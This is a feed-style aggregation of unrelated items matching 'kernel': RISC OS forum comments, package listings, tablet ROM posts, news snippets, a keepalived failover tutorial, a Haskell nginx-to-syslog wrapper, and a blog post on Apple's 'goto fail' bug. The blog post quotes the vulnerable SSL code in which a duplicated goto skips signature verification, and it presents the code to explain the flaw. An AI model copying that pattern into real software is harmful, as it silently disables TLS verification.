ARX and other thoughts   
To me the biggest problem with RISC OS as a modern platform is its fragility. The lack of pre-emptive multi-tasking and decent memory protection are big problems, and IMHO they limit its usefulness as an embedded or PDA OS. Indeed, IMHO RISC OS is probably a worse starting point for a PDA OS than Linux. The GUI is not at all suited to pen-based working, so it would need to be replaced. (PDA pens don't have buttons, so what do you do for menus?) What that leaves you with is the kernel, Filer, Font Manager, and Draw Module. Whilst the Font Manager used to kick arse, it's now looking quite dated, and the Draw Module was always lacking.

What's sad is that Acorn were developing another OS for the Archimedes. It was called ARX, and was being developed at the Acorn Palo Alto Research Centre. It was to be a modern OS with memory protection and pre-emptive multi-tasking like Unix, and a GUI similar to Mac OS - the guys working on it were experts in OS design. Unfortunately the project was poorly managed (as most Acorn projects were). Management decided to kill the project because the predicted finish date was long after the launch date for the Archimedes - Arthur was thrown together in a hurry, and the rest is history.

For those that don't know, Arthur was essentially developed by a bunch of BBC Micro games developers who had little experience in OS design; I believe that none of the folks who had been working on ARX worked on Arthur. It was designed to be compatible (to an extent) with the earlier BBC Micro OS - much of the early software on Archimedes machines consisted of ports of BBC Micro apps. It was never really designed to be a serious OS.

IMHO what Acorn should have done was get in some decent management for the ARX project. Had they done that, they'd have ended up with a serious computer system and things may have turned out differently. They could potentially have competed in the spaces that Unix and Mac OS were dominating.
Unfortunately Arthur meant they were only suited to the education and hobbyist market.
          RE: Is it just me...   
No, it's not just you; there's very little in the article that seems to relate to its title. Shared source for RISC OS seems to me to be too little, too late. It's also currently fiction, since no source has been published. I'm not really convinced that anything can be done for RISC OS to bring back users. There are several reasons for this:

1) RISC OS is closely tied to a single processor architecture (ARM), which inherently restricts its speed, since there are no 3GHz ARM chips. Performance will therefore never be competitive without major re-writes of most of the OS.

2) The hardware cost, as a minority platform, also makes things prohibitive. Hardware price will therefore never be even remotely competitive.

3) Porting to a different platform is impractical (at best) owing to a reliance on ARM code. You'd either need ARM emulation integrated into the kernel, or you'd lose compatibility.

4) Running under emulation also isn't practical as a means of survival - you'll inevitably gradually lose users to the host OS.
          RE[7]: ARX and other thoughts   
Yeah, open source would be great. My grandmother can't wait to compile the latest kernel...
          RE[8]: ARX and other thoughts   
The open source OpenOffice and Firefox packages (which are also available for Windows) don't have kernels, let alone ones you have to compile. And you don't have to compile the kernel on most distros anyway. It's FUD like that which prevents Linux users taking Windows users seriously. The sad part is that although my memory may be faulty on the point, I seem to remember that tomcat wasn't always so full of anti-FOSS/Linux crap.
          RE[8]: ARX and other thoughts   
"My grandmother can't wait to compile the latest kernel..." Pft! Noobs. My grandmother is a kernel programmer :p
          RE[2]: ARX and other thoughts   
Acorn were busy working on their Galileo OS when they folded. The plan for RISC OS was to replace the kernel with the new Galileo kernel, which would have supported pre-emptive multi-tasking and memory protection. I can see no reason why this wouldn't have worked and maintained application compatibility. The way that RISC OS apps work is by running in a loop, continuously asking the windowing system what's happening; it's at this point that the windowing system gives control to other applications before responding. A pre-emption-aware version of the RISC OS windowing system wouldn't necessarily need to hand control over to other applications at that point. Unfortunately a project like Galileo is a major undertaking - almost certainly beyond the abilities of Castle or RISC OS Ltd, even if they put their differences aside and worked on it together.
          Economist on "HFT bros, put down your latency arbs and explain this:"   

Work hours are great; you learn about all the latest in chip design, FPGAs, Linux kernels, GPUs; the best technology; a ton of data to run ML models on; very low key (no clients); everything is free.

The only downside is that it is a shrinking business; the best years were in the past.


          Linux Plumbers Conference: Containers Microconference accepted into Linux Plumbers Conference   

Following on from the Containers Microconference last year, we’re pleased to announce there will be a follow-on at Plumbers in Los Angeles this year.

The agenda for this year will focus on unsolved issues and other problem areas in the Linux kernel container interfaces, with the goal of allowing all container runtimes and orchestration systems to provide enhanced services. Of particular interest is the unprivileged use of container APIs, which can be used both to enable self-containerising applications and to deprivilege (make more secure) container orchestration systems. In addition we will be discussing the potential addition of new namespaces: LSM for per-container security modules; IMA for per-container integrity and appraisal; and file capabilities to allow setcap binaries to run within unprivileged containers.

For more details on this, please see this microconference’s wiki page.

We hope to see you there!


          linux-zen 4.11.8-1 x86_64   
The Linux-zen kernel and modules
          linux-zen-docs 4.11.8-1 x86_64   
Kernel hackers manual - HTML documentation that comes with the Linux-zen kernel
          linux-zen-headers 4.11.8-1 x86_64   
Header files and scripts for building modules for Linux-zen kernel
          linux-zen 4.11.8-1 i686   
The Linux-zen kernel and modules
          linux-zen-docs 4.11.8-1 i686   
Kernel hackers manual - HTML documentation that comes with the Linux-zen kernel
          linux-zen-headers 4.11.8-1 i686   
Header files and scripts for building modules for Linux-zen kernel
          bbswitch-dkms 0.8-69 x86_64   
Kernel module for switching the dedicated graphics card on Optimus laptops
          bbswitch 0.8-69 x86_64   
Kernel module for switching the dedicated graphics card on Optimus laptops
          bbswitch-dkms 0.8-69 i686   
Kernel module for switching the dedicated graphics card on Optimus laptops
          bbswitch 0.8-69 i686   
Kernel module for switching the dedicated graphics card on Optimus laptops
          The Amazon's new danger: Brazil sets sights on palm oil   
Brazil’s ambition to become a palm oil giant could have devastating social and environmental impacts if the move is not carefully managed, say experts. Tom Levitt in Brasília and Heriberto Araujo, The Guardian, 29 Jun 17. Jorge Antonini takes a palm kernel in his hands and slices it open. As he squeezes it between his fingers, the kernel oozes the oily liquid found in hundreds of everyday products, from cakes to chocolate spread. The scientist is standing on a government-owned farm near the Brazilian capital of Brasília. Here, he and a small group of colleagues from Embrapa, the powerful...

this is a summary, for the full version visit the wild news blog
          kernel-4.11.8-1-x86_64   
kernel-4.11.8-1-x86_64
          phpzm/kernel (1.5.0)   
Simples Kernel package
          Oma7144 on Ifive mini 4s   

Use the LineAgeOS flashpack. Just change kernel and resource in folder rockdev/image.

- Oma -


          Oma7144 on [ RK3288 ROM ] IFive Air LineAgeOS 14.1 custom root firmware (2017/03/04)   

Goodix touch.

[ 1.607117] input: Goodix Capacitive TouchScreen as /devices/virtual/input/input2
[ 1.607255] <<-GTP-INFO->> GTP works in interrupt mode.
[ 1.607534] <<-GTP-INFO->> IC VERSION:9271_1040
[ 1.607544] <<-GTP-INFO->> Applied memory size:2562
[ 1.607561] <<-GTP-INFO->> Create proc entry success!

Pls check this kernel: http://crewrktablets.arctablet.com/?wpfb_dl=3103

http://crewrktablets.arctablet.com/?wpfb_dl=3104

- Oma -


          Oma7144 on [ RK3288 ROM ] IFive Mini 4 LineAgeOS 14.1 custom root firmware (2017/06/09)   

MiGHT. said
8. Please change touch-update-frequency to every 3 or 2 pixel (now is 6 i believe)

Not really.

Waiting on another user's feedback to finalize the touch. You corrupted your touch controller by flashing a strange firmware into it. All that can be done is to "halve the touch", which has the reported side effect.

As for other issues pls install the latest Ifive Air v1.2.4 build: http://crewrktablets.arctablet.com/?wpfb_dl=3060

with the latest Mini 4 kernel (change in folder rockdev/Image before flash): http://crewrktablets.arctablet.com/?wpfb_dl=3095

and the Mini 4 model fix (install in TWRP): http://crewrktablets.arctablet.com/?wpfb_dl=3097

For reporting battery stats pls use BatterySpy (see Play Store). Let Android learn the stats for at least two cycles before reporting back.

- Oma -


          Oma7144 on Ifive mini 4s   

This is kernel related. The stock kernel is a bit strange.

There is also a lot of HDMI stuff in it. Does the tab have HDMI?

- Oma -


          Oma7144 on Ifive mini 4s   

I guess we need to build our own kernel for the tab. Maybe early next week.

- Oma -


          Akin to oscine houses solitary    
I just had to come in from my garden and write this article about one of the songbirds that I love to see all year. The Oak Titmouse (known as the Plain Titmouse until the species was split into the Oak Titmouse and the Juniper Titmouse in 1997) is a joy to watch. These birds are exceptionally quick and hardly ever stay still very long. They love to fly down to the sunflower seed feeder, grab a seed real quick, then fly back up into the upper branches of the oak tree and hammer the seed open while holding it with their feet against the limb to get to the meat. The Oak Titmouse is a small, 5 3/4 inch tall, brown-tinged grey bird with a small crest. They live year-round on the Pacific slope from southern Oregon south through California west of the Sierra Nevada to Baja California. They prefer open woodlands of warm, dry oak and oak-pine at low to mid-elevations. It will sleep in tree cavities, dense foliage or birdhouses. When roosting in foliage, the titmouse chooses a twig surrounded by dense leaves or a cluster of dead pine needles, simulating a roost in a hole. They will readily nest in birdhouses very similar to songbird houses, only with a 1 1/4 inch opening. Titmice form pairs or small groups, but do not form large flocks. They may join mixed-species flocks after the breeding season for foraging. The Oak Titmouse mates for life, and pairs defend year-round territories that can be 2 to 5 acres in size. They eat insects and spiders (and we gardeners love them for that), and are sometimes seen catching insects in midair! They will also take berries, acorns and some seeds. They love sunflower seeds. They will forage on foliage, twigs, branches, trunks and occasionally on the ground.
They are attracted to feeders with suet, peanut butter and sunflower seeds. The Oak Titmouse is one of my favourite birds to watch in my own yard. If you can get a pair to nest in your yard or on your property you will love them too!
          Warsaw exchange in the red for the third time   
The WIG 30 index weakened by 0.9% to 2,663.68 points. The Warsaw exchange lost ground for the third session in a row. The worst performers on Friday were shares of gas company PGNiG (PGN; -3.1%), Kernel (KER; -3%) and oil refiner PKN Orlen (PKN; -2.7%). The latter today had...
          Deploying Highly Available Virtual Interfaces With Keepalived   

Linux is a powerhouse when it comes to networking, and provides a full featured and high performance network stack. When combined with web front-ends such as HAProxy, lighttpd, Nginx, or Apache, or your favorite application server, Linux is a killer platform for hosting web applications. Keeping these applications up and operational can sometimes be a challenge, especially in this age of horizontally scaled infrastructure and commodity hardware. But don't fret, since there are a number of technologies that can assist with making your applications and network infrastructure fault tolerant.

One of these technologies, keepalived, provides interface failover and the ability to perform application-layer health checks. When these capabilities are combined with the Linux Virtual Server (LVS) project, a fault in an application will be detected by keepalived, and the virtual interfaces that are accessed by clients can be migrated to another available node. This article will provide an introduction to keepalived, and will show how to configure interface failover between two or more nodes. Additionally, the article will show how to debug problems with keepalived and VRRP.

What Is Keepalived?


The keepalived project provides a keepalive facility for Linux servers. This keepalive facility consists of a VRRP implementation to manage virtual routers (aka virtual interfaces), and a health check facility to determine if a service (web server, samba server, etc.) is up and operational. If a service fails a configurable number of health checks, keepalived will fail a virtual router over to a secondary node. While useful in its own right, keepalived really shines when combined with the Linux Virtual Server project. This article will focus on keepalived, and a future article will show how to integrate the two to create a fault tolerant load-balancer.

Installing KeepAlived From Source Code


Before we dive into configuring keepalived, we need to install it. Keepalived is distributed as source code, and is available in several package repositories. To install from source code, you can execute wget or curl to retrieve the source, and then run "configure", "make" and "make install" to compile and install the software:

$ wget http://www.keepalived.org/software/keepalived-1.1.17.tar.gz
$ tar xfvz keepalived-1.1.17.tar.gz
$ cd keepalived-1.1.17
$ ./configure --prefix=/usr/local
$ make && make install

In the example above, the keepalived daemon will be compiled and installed as /usr/local/sbin/keepalived.

Configuring KeepAlived


The keepalived daemon is configured through a text configuration file, typically named keepalived.conf. This file contains one or more configuration stanzas, which control notification settings, the virtual interfaces to manage, and the health checks to use to test the services that rely on the virtual interfaces. Here is a sample annotated configuration that defines two virtual IP addresses to manage, and the individuals to contact when a state transition or fault occurs:

# Define global configuration directives
global_defs {
    # Send an e-mail to each of the following
    # addresses when a failure occurs
    notification_email {
        matty@prefetch.net
        operations@prefetch.net
    }

    # The address to use in the From: header
    notification_email_from root@VRRP-director1.prefetch.net

    # The SMTP server to route mail through
    smtp_server mail.prefetch.net

    # How long to wait for the mail server to respond
    smtp_connect_timeout 30

    # A descriptive name describing the router
    router_id VRRP-director1
}

# Create a VRRP instance
VRRP_instance VRRP_ROUTER1 {

    # The initial state to transition to. This option isn't
    # really all that valuable, since an election will occur
    # and the host with the highest priority will become
    # the master. The priority is controlled with the priority
    # configuration directive.
    state MASTER

    # The interface keepalived will manage
    interface br0

    # The virtual router id number to assign the routers to
    virtual_router_id 100

    # The priority to assign to this device. This controls
    # who will become the MASTER and BACKUP for a given
    # VRRP instance.
    priority 100

    # How many seconds to wait until a gratuitous arp is sent
    garp_master_delay 2

    # How often to send out VRRP advertisements
    advert_int 1

    # Execute a notification script when a host transitions to
    # MASTER or BACKUP, or when a fault occurs. The arguments
    # passed to the script are:
    #   $1 - "GROUP"|"INSTANCE"
    #   $2 = name of group or instance
    #   $3 = target state of transition
    # Sample: VRRP-notification.sh VRRP_ROUTER1 BACKUP 100
    notify "/usr/local/bin/VRRP-notification.sh"

    # Send an SMTP alert during a state transition
    smtp_alert

    # Authenticate the remote endpoints via a simple
    # username/password combination
    authentication {
        auth_type PASS
        auth_pass 192837465
    }

    # The virtual IP addresses to float between nodes. The
    # label statement can be used to bring an interface
    # online to represent the virtual IP.
    virtual_ipaddress {
        192.168.1.100 label br0:100
        192.168.1.101 label br0:101
    }
}

The configuration file listed above is self-explanatory, so I won't go over each directive in detail. I will point out a couple of items:

  • Each host is referred to as a director in the documentation, and each director can be responsible for one or more VRRP instances
  • Each director will need its own copy of the configuration file, and the router_id, priority, etc. should be adjusted to reflect the node's name and priority relative to other nodes
  • To force a specific node to master a virtual address, make sure the director's priority is higher than the other virtual routers
  • If you have multiple VRRP instances that need to failover together, you will need to add each instance to a VRRP_sync_group
  • The notification script can be used to generate custom syslog messages, or to invoke some custom logic (e.g., restart an app) when a state transition or fault occurs
  • The keepalived package comes with numerous configuration examples, which show how to configure numerous aspects of the server

Starting Keepalived


Keepalived can be executed from an RC script, or started from the command line. The following example will start keepalived using the configuration file /usr/local/etc/keepalived.conf:

$ keepalived -f /usr/local/etc/keepalived.conf 

If you need to debug keepalived issues, you can run the daemon with the "--dont-fork", "--log-console" and "--log-detail" options:

$ keepalived -f /usr/local/etc/keepalived.conf --dont-fork --log-console --log-detail 

These options will stop keepalived from forking, and will provide additional logging data. Using these options is especially useful when you are testing out new configuration directives, or debugging an issue with an existing configuration file.

Locating The Router That is Managing A Virtual IP


To see which director is currently the master for a given virtual interface, you can check the output from the ip utility:

VRRP-director1$ ip addr list br0
5: br0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UNKNOWN 
    link/ether 00:24:8c:4e:07:f6 brd ff:ff:ff:ff:ff:ff
    inet 192.168.1.6/24 brd 192.168.1.255 scope global br0
    inet 192.168.1.100/32 scope global br0:100
    inet 192.168.1.101/32 scope global br0:101
    inet6 fe80::224:8cff:fe4e:7f6/64 scope link 
       valid_lft forever preferred_lft forever

VRRP-director2$ ip addr list br0
5: br0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UNKNOWN 
    link/ether 00:24:8c:4e:07:f6 brd ff:ff:ff:ff:ff:ff
    inet 192.168.1.7/24 brd 192.168.1.255 scope global br0
    inet6 fe80::224:8cff:fe4e:7f6/64 scope link 
       valid_lft forever preferred_lft forever

In the output above, we can see that the virtual interfaces 192.168.1.100 and 192.168.1.101 are currently active on VRRP-director1.

Troubleshooting Keepalived And VRRP


The keepalived daemon will log to syslog by default. Log entries will range from entries that show when the keepalive daemon started, to entries that show state transitions. Here are a few sample entries that show keepalived starting up, and the node transitioning a VRRP instance to the MASTER state:

Jul  3 16:29:56 disarm Keepalived: Starting Keepalived v1.1.17 (07/03,2009)
Jul  3 16:29:56 disarm Keepalived: Starting VRRP child process, pid=1889
Jul  3 16:29:56 disarm Keepalived_VRRP: Using MII-BMSR NIC polling thread...
Jul  3 16:29:56 disarm Keepalived_VRRP: Registering Kernel netlink reflector
Jul  3 16:29:56 disarm Keepalived_VRRP: Registering Kernel netlink command channel
Jul  3 16:29:56 disarm Keepalived_VRRP: Registering gratutious ARP shared channel
Jul  3 16:29:56 disarm Keepalived_VRRP: Opening file '/usr/local/etc/keepalived.conf'.
Jul  3 16:29:56 disarm Keepalived_VRRP: Configuration is using : 62990 Bytes
Jul  3 16:29:57 disarm Keepalived_VRRP: VRRP_Instance(VRRP_ROUTER1) Transition to MASTER STATE
Jul  3 16:29:58 disarm Keepalived_VRRP: VRRP_Instance(VRRP_ROUTER1) Entering MASTER STATE
Jul  3 16:29:58 disarm Keepalived_VRRP: Netlink: skipping nl_cmd msg...

If you are unable to determine the source of a problem with the system logs, you can use tcpdump to display the VRRP advertisements that are sent on the local network. Advertisements are sent to a reserved VRRP multicast address (224.0.0.18), so the following filter can be used to display all VRRP traffic that is visible on the interface passed to the "-i" option:

$ tcpdump -vvv -n -i br0 host 224.0.0.18
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on br0, link-type EN10MB (Ethernet), capture size 96 bytes

10:18:23.621512 IP (tos 0x0, ttl 255, id 102, offset 0, flags [none], proto VRRP (112), length 40) \
                192.168.1.6 > 224.0.0.18: VRRPv2, Advertisement, vrid 100, prio 100, authtype simple, \
                intvl 1s, length 20, addrs: 192.168.1.100 auth "19283746"

10:18:25.621977 IP (tos 0x0, ttl 255, id 103, offset 0, flags [none], proto VRRP (112), length 40) \
                192.168.1.6 > 224.0.0.18: VRRPv2, Advertisement, vrid 100, prio 100, authtype simple, \
                intvl 1s, length 20, addrs: 192.168.1.100 auth "19283746"
                .........

The output contains several pieces of data that can be useful for debugging problems:

authtype - the type of authentication in use (authentication configuration directive)
vrid     - the virtual router id (virtual_router_id configuration directive)
prio     - the priority of the device (priority configuration directive)
intvl    - how often to send out advertisements (advert_int configuration directive)
auth     - the authentication token sent (auth_pass configuration directive)

Conclusion


In this article I described how to set up a host to use the keepalived daemon, and provided a sample configuration file that can be used to fail over virtual interfaces between servers. Keepalived has a slew of options not covered here, and I will refer you to the keepalived source code and documentation for additional details.




          Why were there gotos in apple software in the first place?   

A recent vulnerability in iOS and Mac OS boils down to a duplicated goto that makes critical SSL verification code unreachable.

hashOut.data = hashes + SSL_MD5_DIGEST_LEN;
hashOut.length = SSL_SHA1_DIGEST_LEN;
if ((err = SSLFreeBuffer(&hashCtx)) != 0)
    goto fail;
if ((err = ReadyHash(&SSLHashSHA1, &hashCtx)) != 0)
    goto fail;
if ((err = SSLHashSHA1.update(&hashCtx, &clientRandom)) != 0)
    goto fail;
if ((err = SSLHashSHA1.update(&hashCtx, &serverRandom)) != 0)
    goto fail;
if ((err = SSLHashSHA1.update(&hashCtx, &signedParams)) != 0)
    goto fail;
    goto fail;
if ((err = SSLHashSHA1.final(&hashCtx, &hashOut)) != 0)
    goto fail;

/* ... */

fail:
    SSLFreeBuffer(&signedHashes);
    SSLFreeBuffer(&hashCtx);
    return err;

Since the fail label simply returns err - which is still 0 when the unconditional second goto is reached - no error is reported under normal conditions, making the lack of verification silent.

But gotos are bad, lol

With all the talk about goto being bad (if you haven’t, read Edsger Dijkstra’s famous Go To Considered Harmful), it’s a wonder it can still be found in production code. In this short post I’d like to point out that while goto is generally a code smell, it has one very valid and important use in ANSI C: exception handling.

Let’s look at a simple function that makes use of goto exception handling:

char *
load_file(const char *name, off_t *len)
{
    struct stat  st;
    off_t            size;
    char            *buf = NULL;
    int            fd;

    if ((fd = open(name, O_RDONLY)) == -1)
        return (NULL);
    if (fstat(fd, &st) != 0)
        goto fail;
    size = st.st_size;
    if ((buf = calloc(1, size + 1)) == NULL)
        goto fail;
    if (read(fd, buf, size) != size)
        goto fail;
    close(fd);

    *len = size + 1;
    return (buf);

fail:
    if (buf != NULL)
        free(buf);
    close(fd);
    return (NULL);
}

Here goto serves a few purposes:

  • keep the code intent clear
  • reduce condition branching
  • allow graceful failure handling

While this excerpt is short, it would already be much more awkward to repeat the failure handling code in the body of the if statement testing for error conditions.

A more complex example shows how multiple types of “exceptions” can be handled with goto without falling into the spaghetti code trap.

void
ssl_read(int fd, short event, void *p)
{
    struct bufferevent  *bufev = p;
    struct conn           *s = bufev->cbarg;
    int                      ret;
    int                      ssl_err;
    short                      what;
    size_t                   len;
    char                       rbuf[IBUF_READ_SIZE];
    int                      howmuch = IBUF_READ_SIZE;

    what = EVBUFFER_READ;

    if (event == EV_TIMEOUT) {
        what |= EVBUFFER_TIMEOUT;
        goto err;
    }

    if (bufev->wm_read.high != 0)
        howmuch = MIN(sizeof(rbuf), bufev->wm_read.high);

    ret = SSL_read(s->s_ssl, rbuf, howmuch);
    if (ret <= 0) {
        ssl_err = SSL_get_error(s->s_ssl, ret);

        switch (ssl_err) {
        case SSL_ERROR_WANT_READ:
            goto retry;
        case SSL_ERROR_WANT_WRITE:
            goto retry;
        default:
            if (ret == 0)
                what |= EVBUFFER_EOF;
            else {
                ssl_error("ssl_read");
                what |= EVBUFFER_ERROR;
            }
            goto err;
        }
    }

    if (evbuffer_add(bufev->input, rbuf, ret) == -1) {
        what |= EVBUFFER_ERROR;
        goto err;
    }

    ssl_bufferevent_add(&bufev->ev_read, bufev->timeout_read);

    len = EVBUFFER_LENGTH(bufev->input);
    if (bufev->wm_read.low != 0 && len < bufev->wm_read.low)
        return;
    if (bufev->wm_read.high != 0 && len > bufev->wm_read.high) {
        struct evbuffer *buf = bufev->input;
        event_del(&bufev->ev_read);
        evbuffer_setcb(buf, bufferevent_read_pressure_cb, bufev);
        return;
    }

    if (bufev->readcb != NULL)
        (*bufev->readcb)(bufev, bufev->cbarg);
    return;

retry:
    ssl_bufferevent_add(&bufev->ev_read, bufev->timeout_read);
    return;

err:
    (*bufev->errorcb)(bufev, what, bufev->cbarg);
}

One could wonder why functions aren’t used in lieu of goto statements in this context; it boils down to two things: context and efficiency.

Since the canonical use case of goto is a separate termination path that handles cleanup, it needs context - i.e. local variables - that would have to be carried over to a cleanup function; this would lead to a proliferation of awkward, special-purpose functions.

Additionally, functions create additional stack frames, which may be a concern in some scenarios, especially in kernel programming and critical-path functions.

The take-away

While there is a general sentiment that the goto statement should be avoided, which is mostly valid, it’s not a hard rule and there is, in C, a very valid use case that only goto provides.

In the case of the Apple code, the error did not stem from the use of the goto statement but from an unfortunate typo.

It’s interesting to note that Edsger Dijkstra wrote his original piece at a time when conditional and loop constructs such as if/then/else and while were not available in mainstream languages such as Basic. He later clarified his initial statement, saying:

Please don’t fall into the trap of believing that I am terribly dogmatical about [the goto statement]. I have the uncomfortable feeling that others are making a religion out of it, as if the conceptual problems of programming could be solved by a single trick, by a simple form of coding discipline.

words of wisdom.


          Solving Nginx logging in 60 lines of Haskell   

Nginx is well-known for only logging to files and being unable to log to syslog out of the box.

There are a few ways around this; one that is often proposed is creating named pipes (or FIFOs) before starting up nginx. Pipes have the same properties as regular files in UNIX (adhering to the important notion that everything is a file in UNIX), but they expect data written to them to be consumed by another process at some point. To compensate for the fact that consumers might sometimes be slower than producers, they maintain a buffer of readily available data, with a hard maximum of 64k on Linux systems, for instance.

Small digression: understanding the Linux pipe's maximum buffer size

It can be a bit confusing to figure out the exact size of a FIFO buffer in Linux. Our first reflex is to look at the output of ulimit:

# ulimit -a
core file size          (blocks, -c) 0
data seg size           (kbytes, -d) unlimited
scheduling priority             (-e) 30
file size               (blocks, -f) unlimited
pending signals                 (-i) 63488
max locked memory       (kbytes, -l) unlimited
max memory size         (kbytes, -m) unlimited
open files                      (-n) 1024
pipe size            (512 bytes, -p) 8
POSIX message queues     (bytes, -q) 819200
real-time priority              (-r) 99
stack size              (kbytes, -s) 8192
cpu time               (seconds, -t) unlimited
max user processes              (-u) 63488
virtual memory          (kbytes, -v) unlimited
file locks                      (-x) unlimited

This seems to indicate that the available pipe size in bytes is 512 * 8, amounting to 4KiB. It turns out this is the maximum size of an atomic payload on a pipe (PIPE_BUF), but the kernel reserves several buffers for each created pipe, with a hard limit set in https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/tree/include/linux/pipe_fs_i.h?id=refs/tags/v3.13-rc1#n4.

The limit turns out to be 4096 * 16, amounting to 64KiB, which is still not much.

Pipe consumption strategies

Pipes are tricky beasts and will bite you if you try to consume them from syslog-ng or rsyslog without anything in between. First, let’s see what happens if you write to a pipe which has no consumer:

$ mkfifo foo
$ echo bar > foo

That’s right: having no consumer on a pipe results in blocking writes, which will not please nginx or any other process that expects logging a line to a file to be a fast operation (and in many applications will result in total lock-up).

Even though we can expect a syslog daemon to be up most of the time, this imposes huge availability constraints on a system daemon that should otherwise be able to safely sustain short availability glitches.

A possible solution

What if, instead of letting rsyslog do the work, we wrapped the nginx process with a small wrapper utility responsible for pushing logs out to syslog? The utility would:

  • Clean up old pipes
  • Provision pipes
  • Set up a connection to syslog
  • Start nginx in the foreground, while watching pipes for incoming data

The only requirement with regard to nginx’s configuration is to start it in the foreground, which can be enabled with this single line in nginx.conf:

daemon off;

Wrapper behavior

We will assume that the wrapper utility receives a list of command line arguments corresponding to the pipes it has to open. If, for instance, we only log to /var/log/nginx/access.log and /var/log/nginx/error.log, we could call our wrapper - let’s call it nginxpipe - this way:

nginxpipe nginx-access:/var/log/nginx/access.log nginx-error:/var/log/nginx/error.log

Since the wrapper stays in the foreground to watch over its child nginx process, integration in init scripts has to account for it; for Ubuntu’s Upstart this translates to the following configuration in /etc/init/nginxpipe.conf:

respawn
exec nginxpipe nginx-access:/var/log/nginx/access.log nginx-error:/var/log/nginx/error.log
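
For systemd-based distributions, a minimal service unit achieves the same thing (a sketch: the unit name and the /usr/local/bin install path are assumptions, not part of the original setup):

```ini
# /etc/systemd/system/nginxpipe.service
[Unit]
Description=nginx with syslog-backed logging pipes
After=network.target

[Service]
ExecStart=/usr/local/bin/nginxpipe nginx-access:/var/log/nginx/access.log nginx-error:/var/log/nginx/error.log
Restart=always

[Install]
WantedBy=multi-user.target
```
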

Building the wrapper

For once, the code I’ll show won’t be in Clojure, since Clojure does not lend itself well to such tasks, being hindered by slow startup times and the inability to easily call OS-specific functions. Instead, this will be built in Haskell, which lends itself very well to system programming, much like Go (another more-concise-than-C systems programming language).

First, our main function:

-- Imports for the full program (base, directory, hslogger, process, unix):
import Control.Concurrent
import Control.Monad
import System.Directory
import System.Environment
import System.IO
import System.Log.Handler.Syslog
import System.Log.Logger
import System.Posix.Files
import System.Process

main = do
  mainlog <- openlog "nginxpipe" [PID] DAEMON NOTICE
  updateGlobalLogger rootLoggerName (setHandlers [mainlog])
  updateGlobalLogger rootLoggerName (setLevel NOTICE)
  noticeM "nginxpipe" "starting up"
  args <- getArgs
  mk_pipes $ map get_logname args
  noticeM "nginxpipe" "starting nginx"
  ph <- runCommand "nginx"
  exit_code <- waitForProcess ph
  noticeM "nginxpipe" $ "nginx stopped with code: " ++ show exit_code

We start by creating a log handler, then use it as our only log destination throughout the program. We then call mk_pipes, which loops over the given arguments, and finally start the nginx process and wait for it to return.

The list of arguments given to mk_pipes is slightly modified: it transforms the initial list consisting of

[ "nginx-access:/var/log/nginx/access.log", "nginx-error:/var/log/nginx/error.log"]

into a list of string-tuples:

[("nginx-access","/var/log/nginx/access.log"), ("nginx-error","/var/log/nginx/error.log")]

To create this modified list we just map a simple function over our input list (note that the pattern match assumes each argument contains a colon):

is_colon x = x == ':'
get_logname path = (ltype, p) where (ltype, (_:p)) = break is_colon path

Next up is the pipe creation. Since Haskell has no loop construct, we use tail recursion to iterate over the list of tuples:

mk_pipes :: [(String,String)] -> IO ()
mk_pipes (pipe:pipes) = do
  mk_pipe pipe
  mk_pipes pipes
mk_pipes [] = return ()

The bulk of the work happens in the mk_pipe function:

mk_pipe :: (String,String) -> IO ()
mk_pipe (ltype,path) = do
  safe_remove path
  createNamedPipe path 0o644
  fd <- openFile path ReadMode
  hSetBuffering fd LineBuffering
  void $ forkIO $ forever $ do
    is_eof <- hIsEOF fd
    if is_eof then threadDelay 1000000 else get_line ltype fd

The interesting bit in that function is the last 3 lines, where we create a new “IO thread” with forkIO, inside which we loop forever, sleeping for a second whenever there is no input and logging to syslog when new input comes in.

The two remaining functions, get_line and safe_remove, have very simple definitions. I intentionally left a small race condition in safe_remove to keep it readable:

safe_remove path = do
  exists <- doesFileExist path
  when exists $ removeFile path

get_line ltype fd = do
  line <- hGetLine fd
  noticeM ltype line

I’m not diving into each line of the code; there is plenty of great literature on Haskell. I’d recommend “Real World Haskell” as a great first book on the language.

I just wanted to showcase the fact that Haskell is a great alternative for building fast and lightweight system programs.

The awesome part: distribution!

The full source for this program is available at https://github.com/pyr/nginxpipe, it can be built in one of two ways:

  • Using the cabal dependency management system (which calls GHC)
  • With the GHC compiler directly

With cabal you would just run:

cabal install --prefix=/somewhere

Let’s look at the output:

$ ldd /somewhere/bin/nginxpipe 
linux-vdso.so.1 (0x00007fffe67fe000)
librt.so.1 => /usr/lib/librt.so.1 (0x00007fb8064d8000)
libutil.so.1 => /usr/lib/libutil.so.1 (0x00007fb8062d5000)
libdl.so.2 => /usr/lib/libdl.so.2 (0x00007fb8060d1000)
libpthread.so.0 => /usr/lib/libpthread.so.0 (0x00007fb805eb3000)
libgmp.so.10 => /usr/lib/libgmp.so.10 (0x00007fb805c3c000)
libm.so.6 => /usr/lib/libm.so.6 (0x00007fb805939000)
libgcc_s.so.1 => /usr/lib/libgcc_s.so.1 (0x00007fb805723000)
libc.so.6 => /usr/lib/libc.so.6 (0x00007fb805378000)
/lib64/ld-linux-x86-64.so.2 (0x00007fb8066e0000)
$ du -sh /somewhere/bin/nginxpipe
1.9M /somewhere/bin/nginxpipe

That’s right: no crazy dependencies (for instance, this resolves to the correct dependencies across Arch Linux, Ubuntu and Debian for me) and a smallish executable.

Obviously this is not a complete solution as-is, but quickly adding support for a real configuration file - where, for instance, an alternative command to nginx could be provided - would not be a huge endeavour.

Hopefully this will help you consider haskell for your system programming needs in the future!


          Fedora freezes during shutdown and other commands on kernel kernel-4.11.7-200.fc25.x86_64   
